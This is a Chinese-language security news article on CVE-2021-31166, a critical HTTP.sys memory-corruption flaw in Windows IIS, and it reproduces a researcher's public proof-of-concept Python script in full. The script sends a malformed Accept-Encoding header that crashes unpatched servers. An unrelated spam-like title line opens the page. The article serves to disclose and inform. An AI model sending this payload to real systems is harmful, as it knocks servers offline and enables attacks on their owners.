自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Windows操作系統(tǒng)HTTP協(xié)議棧內(nèi)存破壞漏洞PoC公開

安全 網(wǎng)站安全
CVE-2021-31166漏洞是Windows操作系統(tǒng)中HTTP 協(xié)議棧的內(nèi)存破壞漏洞。該協(xié)議棧是Windows內(nèi)置的IIS 服務(wù)器使用的。如果IIS 服務(wù)器啟用,攻擊者就可以發(fā)送偽造的包來(lái)在操作系統(tǒng)kernel上執(zhí)行也代碼。

[[400112]]

 5月微軟補(bǔ)丁日修復(fù)了一個(gè)CVSSv3評(píng)分9.8分的嚴(yán)重安全漏洞,該漏洞CVE編號(hào)為CVE-2021-31166。近日,有研究人員在GitHub上公布了該漏洞的PoC代碼。

CVE-2021-31166漏洞是Windows操作系統(tǒng)中HTTP 協(xié)議棧的內(nèi)存破壞漏洞。該協(xié)議棧是Windows內(nèi)置的IIS 服務(wù)器使用的。如果IIS 服務(wù)器啟用,攻擊者就可以發(fā)送偽造的包來(lái)在操作系統(tǒng)kernel上執(zhí)行也代碼。微軟稱該漏洞可以被用來(lái)創(chuàng)建網(wǎng)絡(luò)蠕蟲,因此建議優(yōu)先修復(fù)。

雖然該漏洞CVSS評(píng)分為9.8分,聽起來(lái)非常危險(xiǎn),但該漏洞只影響最新的一些Windows版本,具體影響Windows 10、Windows server 2004、Windows server 20H2的不同版本。

5月17日,安全研究人員Axel Souchet在GitHub上公開了該漏洞的PoC代碼。該P(yáng)oC代碼可以使運(yùn)行IIS 服務(wù)器的未修復(fù)的Windows系統(tǒng)奔潰,但是并沒(méi)有實(shí)現(xiàn)蠕蟲功能。

PoC代碼參見:https://github.com/0vercl0k/CVE-2021-31166

  1. import requests 
  2. import argparse 
  3.   
  4.   
  5. def main(): 
  6.     parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys'
  7.     parser.add_argument('--target', required = True
  8.     args = parser.parse_args() 
  9.     r = requests.get(f'http://{args.target}/', headers = { 
  10.         'Accept-Encoding''doar-e, ftw, imo, ,'
  11.     }) 
  12.     print(r) 

PoC視頻參見: https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif

本文翻譯自:https://therecord.media/poc-released-for-wormable-windows-iis-bug/如若轉(zhuǎn)載,請(qǐng)注明原文地址。

 

責(zé)任編輯:姜華 來(lái)源: 嘶吼網(wǎng)
相關(guān)推薦

2010-01-20 10:38:54

2009-10-26 08:50:44

Windows 7競(jìng)爭(zhēng)蘋果

2021-07-22 23:16:15

2025-01-07 13:36:51

2022-02-10 07:13:40

SSH協(xié)議客戶端服務(wù)端

2010-01-25 11:28:59

2013-07-11 09:25:49

2022-08-04 08:44:31

Android系統(tǒng)攻擊鏈

2022-11-28 07:21:53

操作系統(tǒng)內(nèi)存管理

2010-04-20 14:17:21

Unix操作系統(tǒng)

2020-12-25 10:08:30

漏洞Windows操作系統(tǒng)

2020-10-15 10:54:31

安全漏洞微軟

2009-09-04 10:47:33

2010-04-15 11:41:40

Unix操作系統(tǒng)

2009-12-04 17:54:07

Windows 7操作

2009-12-08 18:02:50

2009-08-17 08:32:56

Linux操作系統(tǒng)內(nèi)存管理Linux

2009-12-16 09:40:26

Linux操作系統(tǒng)

2023-04-07 09:12:11

2021-11-10 11:51:33

BrakTooth安全漏洞藍(lán)牙設(shè)備
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)